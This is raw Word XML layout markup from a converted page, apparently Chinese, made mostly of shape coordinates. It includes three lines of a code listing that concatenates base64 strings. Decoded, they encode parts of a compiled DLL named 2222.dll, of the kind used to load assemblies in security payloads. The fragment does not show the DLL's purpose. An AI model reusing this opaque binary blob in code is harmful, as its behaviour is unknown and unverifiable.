2275,15342,2275,15340,2275,15339,2275,15338,2275,15337,2275,15335,2275,15334,2275,15332,2275,15331,2275,15329,2275,15327,2275,15326,2275,15324,2275,15322,2275,15320,2275,15318,2275,15316,2275,15314,2275,15312,2275,15310,2275,15308,2275,15305,2275,15303,2275,15300,2275,15298,2275,15295,2275,15293,2275,15290,2275,15287,2275,15284,2275,15281,2275,15278,2275,15275,2275,15272,2275,15269,2275,15265,2275,15262,2275,15259,2275,15255,2275,15251,2275,15248,2275,15244,2275,15240,2275,15236,2275,15232,2275,15228,2275,15224,2275,15219,2275,15215,2275,15210,2275,15206,2275,15201,2275,15196,2275,15191,2275,15186,2275,15181,2275,15176,2275,15171,2275,15166,2275,15160,2275,15155,2275,15149,2275,15143,2275,15137,2275,15131,2275,15125,2275,15119,2275,15113,2275,15107e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:154.500pt;margin-top:754.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3090,15090" coordsize="130,270">
        <v:shape style="position:absolute;left:3090;top:15090;width:130;height:270" coordorigin="3090,15090" coordsize="130,270" path="m3116,15107l3116,15107,3116,15107,3116,15107,3116,15107,3116,15107,3116,15107,3116,15107,3116,15107,3116,15107,3116,15107,3116,15107,3116,15107,3116,15107,3116,15107,3116,15107,3116,15107,3116,15107,3116,15107,3116,15107,3116,15107,3116,15107,3116,15107,3116,15107,3116,15107,3117,15107,3117,15107,3117,15107,3117,15107,3117,15107,3117,15107,3117,15107,3118,15107,3118,15107,3118,15107,3118,15107,3119,15107,3119,15107,3119,15107,3119,15107,3120,15107,3120,15107,3120,15107,3121,15107,3121,15107,3122,15107,3122,15107,3123,15107,3123,15107,3123,15107,3124,15107,3124,15107,3125,15107,3126,15107,3126,15107,3127,15107,3127,15107,3128,15107,3129,15107,3129,15107,3130,15107,3131,15107,3132,15107,3133,15107,3133,15107,3134,15107,3135,15107,3136,15107,3137,15107,3138,15107,3139,15107,3140,15107,3141,15107,3142,15107,3143,15107,3144,15107,3146,15107,3147,15107,3148,15107,3149,15107,3151,15107,3152,15107,3153,15107,3155,15107,3156,15107,3158,15107,3159,15107,3161,15107,3162,15107,3164,15107,3166,15107,3168,15107,3169,15107,3171,15107,3173,15107,3175,15107,3177,15107,3179,15107,3181,15107,3183,15107,3185,15107,3187,15107,3189,15107,3191,15107,3193,15107,3196,15107,3198,15107,3200,15107,3203,15107,3205,15107,3208,15107,3210,15107,3213,15107,3216,15107,3218,15107,3221,15107,3224,15107,3227,15107,3230,15107,3233,15107,3236,15107,3236,15107,3236,15107,3236,15107,3236,15107,3236,15107,3236,15107,3236,15107,3236,15107,3236,15107,3236,15107,3236,15107,3236,15107,3236,15107,3236,15107,3236,15107,3236,15107,3236,15107,3236,15107,3236,15107,3236,15108,3236,15108,3236,15108,3236,15108,3236,15108,3236,15109,3236,15109,3236,15109,3236,15110,3236,15110,3236,15110,3236,15111,3236,15111,3236,15112,3236,15112,3236,15113,3236,15113,3236,15114,3236,15114,3236,15115,3236,15116,3236,15116,3236,15117,3236,15118,3236,15119,3236,15120,3236,15120,3236,15121,3236,15122,3236,15123,3236,15124,3236,15126,3236,15127,3236,15128,3236,15129,3236,15130,3236,15132,3236,15133,3236,15135,3236,15136,3236,15138,3236,15139,3236,15141,3236,15143,3236,15144,3236,15146,3236,15148,3236,15150,3236,15152,3236,15154,3236,15156,3236,15159,3236,15161,3236,15163,3236,15166,3236,15168,3236,15170,3236,15173,3236,15176,3236,15178,3236,15181,3236,15184,3236,15187,3236,15190,3236,15193,3236,15196,3236,15200,3236,15203,3236,15206,3236,15210,3236,15213,3236,15217,3236,15221,3236,15225,3236,15228,3236,15232,3236,15236,3236,15241,3236,15245,3236,15249,3236,15254,3236,15258,3236,15263,3236,15267,3236,15272,3236,15277,3236,15282,3236,15287,3236,15292,3236,15297,3236,15303,3236,15308,3236,15314,3236,15319,3236,15325,3236,15331,3236,15337,3236,15343,3236,15349,3236,15355,3236,15362,3236,15362,3236,15362,3236,15362,3236,15362,3236,15362,3236,15362,3236,15362,3236,15362,3236,15362,3236,15362,3236,15362,3236,15362,3236,15362,3235,15362,3235,15362,3235,15362,3235,15362,3235,15362,3235,15362,3235,15362,3235,15362,3235,15362,3235,15362,3235,15362,3235,15362,3235,15362,3234,15362,3234,15362,3234,15362,3234,15362,3234,15362,3234,15362,3233,15362,3233,15362,3233,15362,3233,15362,3232,15362,3232,15362,3232,15362,3231,15362,3231,15362,3231,15362,3230,15362,3230,15362,3230,15362,3229,15362,3229,15362,3228,15362,3228,15362,3227,15362,3227,15362,3226,15362,3226,15362,3225,15362,3224,15362,3224,15362,3223,15362,3222,15362,3222,15362,3221,15362,3220,15362,3219,15362,3219,15362,3218,15362,3217,15362,3216,15362,3215,15362,3214,15362,3213,15362,3212,15362,3211,15362,3210,15362,3209,15362,3208,15362,3207,15362,3206,15362,3204,15362,3203,15362,3202,15362,3201,15362,3199,15362,3198,15362,3196,15362,3195,15362,3193,15362,3192,15362,3190,15362,3189,15362,3187,15362,3185,15362,3184,15362,3182,15362,3180,15362,3178,15362,3176,15362,3175,15362,3173,15362,3171,15362,3169,15362,3166,15362,3164,15362,3162,15362,3160,15362,3158,15362,3155,15362,3153,15362,3151,15362,3148,15362,3146,15362,3143,15362,3141,15362,3138,15362,3136,15362,3133,15362,3130,15362,3127,15362,3124,15362,3122,15362,3119,15362,3116,15362,3116,15362,3116,15362,3116,15362,3116,15362,3116,15362,3116,15362,3116,15362,3116,15362,3116,15362,3116,15362,3116,15362,3116,15362,3116,15361,3116,15361,3116,15361,3116,15361,3116,15361,3116,15361,3116,15361,3116,15361,3116,15361,3116,15360,3116,15360,3116,15360,3116,15360,3116,15359,3116,15359,3116,15359,3116,15358,3116,15358,3116,15358,3116,15357,3116,15357,3116,15356,3116,15356,3116,15355,3116,15355,3116,15354,3116,15353,3116,15353,3116,15352,3116,15351,3116,15351,3116,15350,3116,15349,3116,15348,3116,15347,3116,15346,3116,15345,3116,15344,3116,15343,3116,15342,3116,15340,3116,15339,3116,15338,3116,15337,3116,15335,3116,15334,3116,15332,3116,15331,3116,15329,3116,15327,3116,15326,3116,15324,3116,15322,3116,15320,3116,15318,3116,15316,3116,15314,3116,15312,3116,15310,3116,15308,3116,15305,3116,15303,3116,15300,3116,15298,3116,15295,3116,15293,3116,15290,3116,15287,3116,15284,3116,15281,3116,15278,3116,15275,3116,15272,3116,15269,3116,15265,3116,15262,3116,15259,3116,15255,3116,15251,3116,15248,3116,15244,3116,15240,3116,15236,3116,15232,3116,15228,3116,15224,3116,15219,3116,15215,3116,15210,3116,15206,3116,15201,3116,15196,3116,15191,3116,15186,3116,15181,3116,15176,3116,15171,3116,15166,3116,15160,3116,15155,3116,15149,3116,15143,3116,15137,3116,15131,3116,15125,3116,15119,3116,15113,3116,15107e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:106.500pt;margin-top:772.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2130,15450" coordsize="130,270">
        <v:shape style="position:absolute;left:2130;top:15450;width:130;height:270" coordorigin="2130,15450" coordsize="130,270" path="m2155,15467l2155,15467,2155,15467,2155,15467,2155,15467,2155,15467,2155,15467,2155,15467,2155,15467,2155,15467,2155,15467,2155,15467,2155,15467,2155,15467,2155,15467,2155,15467,2155,15467,2155,15467,2155,15467,2155,15467,2156,15467,2156,15467,2156,15467,2156,15467,2156,15467,2156,15467,2156,15467,2156,15467,2156,15467,2157,15467,2157,15467,2157,15467,2157,15467,2157,15467,2158,15467,2158,15467,2158,15467,2158,15467,2159,15467,2159,15467,2159,15467,2160,15467,2160,15467,2160,15467,2161,15467,2161,15467,2162,15467,2162,15467,2162,15467,2163,15467,2163,15467,2164,15467,2165,15467,2165,15467,2166,15467,2166,15467,2167,15467,2168,15467,2168,15467,2169,15467,2170,15467,2170,15467,2171,15467,2172,15467,2173,15467,2174,15467,2175,15467,2176,15467,2177,15467,2177,15467,2178,15467,2180,15467,2181,15467,2182,15467,2183,15467,2184,15467,2185,15467,2186,15467,2188,15467,2189,15467,2190,15467,2192,15467,2193,15467,2194,15467,2196,15467,2197,15467,2199,15467,2200,15467,2202,15467,2204,15467,2205,15467,2207,15467,2209,15467,2211,15467,2212,15467,2214,15467,2216,15467,2218,15467,2220,15467,2222,15467,2224,15467,2226,15467,2228,15467,2231,15467,2233,15467,2235,15467,2238,15467,2240,15467,2242,15467,2245,15467,2247,15467,2250,15467,2253,15467,2255,15467,2258,15467,2261,15467,2263,15467,2266,15467,2269,15467,2272,15467,2275,15467,2275,15467,2275,15467,2275,15467,2275,15467,2275,15467,2275,15467,2275,15467,2275,15467,2275,15467,2275,15467,2275,15467,2275,15467,2275,15467,2275,15467,2275,15467,2275,15467,2275,15467,2275,15468,2275,15468,2275,15468,2275,15468,2275,15468,2275,15468,2275,15469,2275,15469,2275,15469,2275,15469,2275,15470,2275,15470,2275,15470,2275,15471,2275,15471,2275,15472,2275,15472,2275,15473,2275,15473,2275,15474,2275,15474,2275,15475,2275,15476,2275,15476,2275,15477,2275,15478,2275,15479,2275,15480,2275,15481,2275,15482,2275,15483,2275,15484,2275,15485,2275,15486,2275,15487,2275,15488,2275,15489,2275,15491,2275,15492,2275,15493,2275,15495,2275,15496,2275,15498,2275,15499,2275,15501,2275,15503,2275,15505,2275,15506,2275,15508,2275,15510,2275,15512,2275,15514,2275,15517,2275,15519,2275,15521,2275,15523,2275,15526,2275,15528,2275,15531,2275,15533,2275,15536,2275,15539,2275,15541,2275,15544,2275,15547,2275,15550,2275,15553,2275,15557,2275,15560,2275,15563,2275,15566,2275,15570,2275,15574,2275,15577,2275,15581,2275,15585,2275,15589,2275,15593,2275,15597,2275,15601,2275,15605,2275,15609,2275,15614,2275,15618,2275,15623,2275,15627,2275,15632,2275,15637,2275,15642,2275,15647,2275,15652,2275,15658,2275,15663,2275,15668,2275,15674,2275,15679,2275,15685,2275,15691,2275,15697,2275,15703,2275,15709,2275,15716,2275,15722,2275,15722,2275,15722,2275,15722,2275,15722,2275,15722,2275,15722,2275,15722,2275,15722,2275,15722,2275,15722,2275,15722,2275,15722,2275,15722,2275,15722,2275,15722,2275,15722,2275,15722,2275,15722,2275,15722,2275,15722,2275,15722,2274,15722,2274,15722,2274,15722,2274,15722,2274,15722,2274,15722,2274,15722,2274,15722,2273,15722,2273,15722,2273,15722,2273,15722,2273,15722,2272,15722,2272,15722,2272,15722,2272,15722,2271,15722,2271,15722,2271,15722,2270,15722,2270,15722,2269,15722,2269,15722,2269,15722,2268,15722,2268,15722,2267,15722,2267,15722,2266,15722,2266,15722,2265,15722,2265,15722,2264,15722,2263,15722,2263,15722,2262,15722,2261,15722,2261,15722,2260,15722,2259,15722,2258,15722,2257,15722,2256,15722,2256,15722,2255,15722,2254,15722,2253,15722,2252,15722,2251,15722,2250,15722,2249,15722,2247,15722,2246,15722,2245,15722,2244,15722,2243,15722,2241,15722,2240,15722,2239,15722,2237,15722,2236,15722,2234,15722,2233,15722,2231,15722,2230,15722,2228,15722,2227,15722,2225,15722,2223,15722,2221,15722,2220,15722,2218,15722,2216,15722,2214,15722,2212,15722,2210,15722,2208,15722,2206,15722,2204,15722,2202,15722,2200,15722,2197,15722,2195,15722,2193,15722,2190,15722,2188,15722,2185,15722,2183,15722,2180,15722,2178,15722,2175,15722,2172,15722,2170,15722,2167,15722,2164,15722,2161,15722,2158,15722,2155,15722,2155,15722,2155,15722,2155,15722,2155,15722,2155,15722,2155,15722,2155,15722,2155,15722,2155,15722,2155,15722,2155,15722,2155,15722,2155,15722,2155,15722,2155,15722,2155,15721,2155,15721,2155,15721,2155,15721,2155,15721,2155,15721,2155,15721,2155,15720,2155,15720,2155,15720,2155,15720,2155,15719,2155,15719,2155,15719,2155,15718,2155,15718,2155,15717,2155,15717,2155,15716,2155,15716,2155,15715,2155,15715,2155,15714,2155,15714,2155,15713,2155,15712,2155,15711,2155,15711,2155,15710,2155,15709,2155,15708,2155,15707,2155,15706,2155,15705,2155,15704,2155,15703,2155,15702,2155,15701,2155,15699,2155,15698,2155,15697,2155,15695,2155,15694,2155,15692,2155,15691,2155,15689,2155,15688,2155,15686,2155,15684,2155,15682,2155,15680,2155,15678,2155,15676,2155,15674,2155,15672,2155,15670,2155,15668,2155,15665,2155,15663,2155,15661,2155,15658,2155,15655,2155,15653,2155,15650,2155,15647,2155,15644,2155,15641,2155,15638,2155,15635,2155,15632,2155,15629,2155,15626,2155,15622,2155,15619,2155,15615,2155,15612,2155,15608,2155,15604,2155,15600,2155,15596,2155,15592,2155,15588,2155,15584,2155,15579,2155,15575,2155,15571,2155,15566,2155,15561,2155,15556,2155,15552,2155,15547,2155,15542,2155,15536,2155,15531,2155,15526,2155,15520,2155,15515,2155,15509,2155,15503,2155,15498,2155,15492,2155,15486,2155,15479,2155,15473,2155,15467e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:112.500pt;margin-top:772.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2250,15450" coordsize="130,270">
        <v:shape style="position:absolute;left:2250;top:15450;width:130;height:270" coordorigin="2250,15450" coordsize="130,270" path="m2275,15467l2275,15467,2275,15467,2275,15467,2275,15467,2275,15467,2275,15467,2275,15467,2275,15467,2275,15467,2275,15467,2275,15467,2275,15467,2275,15467,2275,15467,2275,15467,2275,15467,2275,15467,2275,15467,2276,15467,2276,15467,2276,15467,2276,15467,2276,15467,2276,15467,2276,15467,2276,15467,2276,15467,2277,15467,2277,15467,2277,15467,2277,15467,2277,15467,2277,15467,2278,15467,2278,15467,2278,15467,2278,15467,2279,15467,2279,15467,2279,15467,2280,15467,2280,15467,2280,15467,2281,15467,2281,15467,2282,15467,2282,15467,2283,15467,2283,15467,2284,15467,2284,15467,2285,15467,2285,15467,2286,15467,2286,15467,2287,15467,2288,15467,2288,15467,2289,15467,2290,15467,2291,15467,2291,15467,2292,15467,2293,15467,2294,15467,2295,15467,2296,15467,2297,15467,2298,15467,2299,15467,2300,15467,2301,15467,2302,15467,2303,15467,2304,15467,2305,15467,2306,15467,2308,15467,2309,15467,2310,15467,2312,15467,2313,15467,2314,15467,2316,15467,2317,15467,2319,15467,2320,15467,2322,15467,2324,15467,2325,15467,2327,15467,2329,15467,2331,15467,2332,15467,2334,15467,2336,15467,2338,15467,2340,15467,2342,15467,2344,15467,2346,15467,2349,15467,2351,15467,2353,15467,2355,15467,2358,15467,2360,15467,2362,15467,2365,15467,2367,15467,2370,15467,2373,15467,2375,15467,2378,15467,2381,15467,2384,15467,2386,15467,2389,15467,2392,15467,2395,15467,2395,15467,2395,15467,2395,15467,2395,15467,2395,15467,2395,15467,2395,15467,2395,15467,2395,15467,2395,15467,2395,15467,2395,15467,2395,15467,2395,15467,2395,15467,2395,15467,2395,15467,2395,15468,2395,15468,2395,15468,2395,15468,2395,15468,2395,15468,2395,15469,2395,15469,2395,15469,2395,15469,2395,15470,2395,15470,2395,15470,2395,15471,2395,15471,2395,15472,2395,15472,2395,15473,2395,15473,2395,15474,2395,15474,2395,15475,2395,15476,2395,15476,2395,15477,2395,15478,2395,15479,2395,15480,2395,15481,2395,15482,2395,15483,2395,15484,2395,15485,2395,15486,2395,15487,2395,15488,2395,15489,2395,15491,2395,15492,2395,15493,2395,15495,2395,15496,2395,15498,2395,15499,2395,15501,2395,15503,2395,15505,2395,15506,2395,15508,2395,15510,2395,15512,2395,15514,2395,15517,2395,15519,2395,15521,2395,15523,2395,15526,2395,15528,2395,15531,2395,15533,2395,15536,2395,15539,2395,15541,2395,15544,2395,15547,2395,15550,2395,15553,2395,15557,2395,15560,2395,15563,2395,15566,2395,15570,2395,15574,2395,15577,2395,15581,2395,15585,2395,15589,2395,15593,2395,15597,2395,15601,2395,15605,2395,15609,2395,15614,2395,15618,2395,15623,2395,15627,2395,15632,2395,15637,2395,15642,2395,15647,2395,15652,2395,15658,2395,15663,2395,15668,2395,15674,2395,15679,2395,15685,2395,15691,2395,15697,2395,15703,2395,15709,2395,15716,2395,15722,2395,15722,2395,15722,2395,15722,2395,15722,2395,15722,2395,15722,2395,15722,2395,15722,2395,15722,2395,15722,2395,15722,2395,15722,2395,15722,2395,15722,2395,15722,2395,15722,2395,15722,2395,15722,2395,15722,2395,15722,2395,15722,2395,15722,2394,15722,2394,15722,2394,15722,2394,15722,2394,15722,2394,15722,2394,15722,2393,15722,2393,15722,2393,15722,2393,15722,2393,15722,2392,15722,2392,15722,2392,15722,2392,15722,2391,15722,2391,15722,2391,15722,2390,15722,2390,15722,2390,15722,2389,15722,2389,15722,2388,15722,2388,15722,2387,15722,2387,15722,2386,15722,2386,15722,2385,15722,2385,15722,2384,15722,2383,15722,2383,15722,2382,15722,2381,15722,2381,15722,2380,15722,2379,15722,2378,15722,2377,15722,2377,15722,2376,15722,2375,15722,2374,15722,2373,15722,2372,15722,2371,15722,2370,15722,2369,15722,2367,15722,2366,15722,2365,15722,2364,15722,2363,15722,2361,15722,2360,15722,2359,15722,2357,15722,2356,15722,2354,15722,2353,15722,2351,15722,2350,15722,2348,15722,2347,15722,2345,15722,2343,15722,2342,15722,2340,15722,2338,15722,2336,15722,2334,15722,2332,15722,2330,15722,2328,15722,2326,15722,2324,15722,2322,15722,2320,15722,2317,15722,2315,15722,2313,15722,2310,15722,2308,15722,2305,15722,2303,15722,2300,15722,2298,15722,2295,15722,2292,15722,2290,15722,2287,15722,2284,15722,2281,15722,2278,15722,2275,15722,2275,15722,2275,15722,2275,15722,2275,15722,2275,15722,2275,15722,2275,15722,2275,15722,2275,15722,2275,15722,2275,15722,2275,15722,2275,15722,2275,15722,2275,15722,2275,15721,2275,15721,2275,15721,2275,15721,2275,15721,2275,15721,2275,15721,2275,15720,2275,15720,2275,15720,2275,15720,2275,15719,2275,15719,2275,15719,2275,15718,2275,15718,2275,15717,2275,15717,2275,15716,2275,15716,2275,15715,2275,15715,2275,15714,2275,15714,2275,15713,2275,15712,2275,15711,2275,15711,2275,15710,2275,15709,2275,15708,2275,15707,2275,15706,2275,15705,2275,15704,2275,15703,2275,15702,2275,15701,2275,15699,2275,15698,2275,15697,2275,15695,2275,15694,2275,15692,2275,15691,2275,15689,2275,15688,2275,15686,2275,15684,2275,15682,2275,15680,2275,15678,2275,15676,2275,15674,2275,15672,2275,15670,2275,15668,2275,15665,2275,15663,2275,15661,2275,15658,2275,15655,2275,15653,2275,15650,2275,15647,2275,15644,2275,15641,2275,15638,2275,15635,2275,15632,2275,15629,2275,15626,2275,15622,2275,15619,2275,15615,2275,15612,2275,15608,2275,15604,2275,15600,2275,15596,2275,15592,2275,15588,2275,15584,2275,15579,2275,15575,2275,15571,2275,15566,2275,15561,2275,15556,2275,15552,2275,15547,2275,15542,2275,15536,2275,15531,2275,15526,2275,15520,2275,15515,2275,15509,2275,15503,2275,15498,2275,15492,2275,15486,2275,15479,2275,15473,2275,15467e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:190.500pt;margin-top:772.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3810,15450" coordsize="130,270">
        <v:shape style="position:absolute;left:3810;top:15450;width:130;height:270" coordorigin="3810,15450" coordsize="130,270" path="m3836,15467l3836,15467,3836,15467,3836,15467,3836,15467,3836,15467,3836,15467,3836,15467,3836,15467,3836,15467,3836,15467,3836,15467,3836,15467,3836,15467,3836,15467,3836,15467,3836,15467,3836,15467,3836,15467,3836,15467,3836,15467,3837,15467,3837,15467,3837,15467,3837,15467,3837,15467,3837,15467,3837,15467,3837,15467,3837,15467,3838,15467,3838,15467,3838,15467,3838,15467,3838,15467,3839,15467,3839,15467,3839,15467,3840,15467,3840,15467,3840,15467,3840,15467,3841,15467,3841,15467,3842,15467,3842,15467,3842,15467,3843,15467,3843,15467,3844,15467,3844,15467,3845,15467,3845,15467,3846,15467,3847,15467,3847,15467,3848,15467,3848,15467,3849,15467,3850,15467,3851,15467,3851,15467,3852,15467,3853,15467,3854,15467,3855,15467,3855,15467,3856,15467,3857,15467,3858,15467,3859,15467,3860,15467,3861,15467,3863,15467,3864,15467,3865,15467,3866,15467,3867,15467,3868,15467,3870,15467,3871,15467,3872,15467,3874,15467,3875,15467,3877,15467,3878,15467,3880,15467,3881,15467,3883,15467,3884,15467,3886,15467,3888,15467,3890,15467,3891,15467,3893,15467,3895,15467,3897,15467,3899,15467,3901,15467,3903,15467,3905,15467,3907,15467,3909,15467,3912,15467,3914,15467,3916,15467,3918,15467,3921,15467,3923,15467,3926,15467,3928,15467,3931,15467,3933,15467,3936,15467,3939,15467,3941,15467,3944,15467,3947,15467,3950,15467,3953,15467,3956,15467,3956,15467,3956,15467,3956,15467,3956,15467,3956,15467,3956,15467,3956,15467,3956,15467,3956,15467,3956,15467,3956,15467,3956,15467,3956,15467,3956,15467,3956,15467,3956,15467,3956,15467,3956,15468,3956,15468,3956,15468,3956,15468,3956,15468,3956,15468,3956,15469,3956,15469,3956,15469,3956,15469,3956,15470,3956,15470,3956,15470,3956,15471,3956,15471,3956,15472,3956,15472,3956,15473,3956,15473,3956,15474,3956,15474,3956,15475,3956,15476,3956,15476,3956,15477,3956,15478,3956,15479,3956,15480,3956,15481,3956,15482,3956,15483,3956,15484,3956,15485,3956,15486,3956,15487,3956,15488,3956,15489,3956,15491,3956,15492,3956,15493,3956,15495,3956,15496,3956,15498,3956,15499,3956,15501,3956,15503,3956,15505,3956,15506,3956,15508,3956,15510,3956,15512,3956,15514,3956,15517,3956,15519,3956,15521,3956,15523,3956,15526,3956,15528,3956,15531,3956,15533,3956,15536,3956,15539,3956,15541,3956,15544,3956,15547,3956,15550,3956,15553,3956,15557,3956,15560,3956,15563,3956,15566,3956,15570,3956,15574,3956,15577,3956,15581,3956,15585,3956,15589,3956,15593,3956,15597,3956,15601,3956,15605,3956,15609,3956,15614,3956,15618,3956,15623,3956,15627,3956,15632,3956,15637,3956,15642,3956,15647,3956,15652,3956,15658,3956,15663,3956,15668,3956,15674,3956,15679,3956,15685,3956,15691,3956,15697,3956,15703,3956,15709,3956,15716,3956,15722,3956,15722,3956,15722,3956,15722,3956,15722,3956,15722,3956,15722,3956,15722,3956,15722,3956,15722,3956,15722,3956,15722,3956,15722,3956,15722,3956,15722,3956,15722,3956,15722,3956,15722,3956,15722,3956,15722,3956,15722,3955,15722,3955,15722,3955,15722,3955,15722,3955,15722,3955,15722,3955,15722,3955,15722,3954,15722,3954,15722,3954,15722,3954,15722,3954,15722,3953,15722,3953,15722,3953,15722,3953,15722,3952,15722,3952,15722,3952,15722,3951,15722,3951,15722,3951,15722,3950,15722,3950,15722,3949,15722,3949,15722,3949,15722,3948,15722,3948,15722,3947,15722,3947,15722,3946,15722,3945,15722,3945,15722,3944,15722,3943,15722,3943,15722,3942,15722,3941,15722,3941,15722,3940,15722,3939,15722,3938,15722,3937,15722,3936,15722,3936,15722,3935,15722,3934,15722,3933,15722,3932,15722,3930,15722,3929,15722,3928,15722,3927,15722,3926,15722,3925,15722,3923,15722,3922,15722,3921,15722,3920,15722,3918,15722,3917,15722,3915,15722,3914,15722,3912,15722,3911,15722,3909,15722,3907,15722,3906,15722,3904,15722,3902,15722,3901,15722,3899,15722,3897,15722,3895,15722,3893,15722,3891,15722,3889,15722,3887,15722,3885,15722,3883,15722,3880,15722,3878,15722,3876,15722,3874,15722,3871,15722,3869,15722,3866,15722,3864,15722,3861,15722,3859,15722,3856,15722,3853,15722,3850,15722,3848,15722,3845,15722,3842,15722,3839,15722,3836,15722,3836,15722,3836,15722,3836,15722,3836,15722,3836,15722,3836,15722,3836,15722,3836,15722,3836,15722,3836,15722,3836,15722,3836,15722,3836,15722,3836,15722,3836,15722,3836,15721,3836,15721,3836,15721,3836,15721,3836,15721,3836,15721,3836,15721,3836,15720,3836,15720,3836,15720,3836,15720,3836,15719,3836,15719,3836,15719,3836,15718,3836,15718,3836,15717,3836,15717,3836,15716,3836,15716,3836,15715,3836,15715,3836,15714,3836,15714,3836,15713,3836,15712,3836,15711,3836,15711,3836,15710,3836,15709,3836,15708,3836,15707,3836,15706,3836,15705,3836,15704,3836,15703,3836,15702,3836,15701,3836,15699,3836,15698,3836,15697,3836,15695,3836,15694,3836,15692,3836,15691,3836,15689,3836,15688,3836,15686,3836,15684,3836,15682,3836,15680,3836,15678,3836,15676,3836,15674,3836,15672,3836,15670,3836,15668,3836,15665,3836,15663,3836,15661,3836,15658,3836,15655,3836,15653,3836,15650,3836,15647,3836,15644,3836,15641,3836,15638,3836,15635,3836,15632,3836,15629,3836,15626,3836,15622,3836,15619,3836,15615,3836,15612,3836,15608,3836,15604,3836,15600,3836,15596,3836,15592,3836,15588,3836,15584,3836,15579,3836,15575,3836,15571,3836,15566,3836,15561,3836,15556,3836,15552,3836,15547,3836,15542,3836,15536,3836,15531,3836,15526,3836,15520,3836,15515,3836,15509,3836,15503,3836,15498,3836,15492,3836,15486,3836,15479,3836,15473,3836,15467e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>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86" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11920" w:h="16840"/>
          <w:pgMar w:header="0" w:footer="0" w:top="0" w:bottom="0" w:left="0" w:right="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="235" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="1369" w:firstLine="-15"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>116</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"AAAAADAALgAwAC4AMAAuADAAAAA0AAkAAQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ADIAMgAy"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="163"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117</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"ADIALgBkAGwAbAAAAAAAKAACAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>IAAAADwA"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="148"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118</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"CQABAE8AcgBpAGcAaQBuAGEAbABGAGkAbABlAG4AYQBtAGUAAAAyADIAMgAyAC4AZABs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
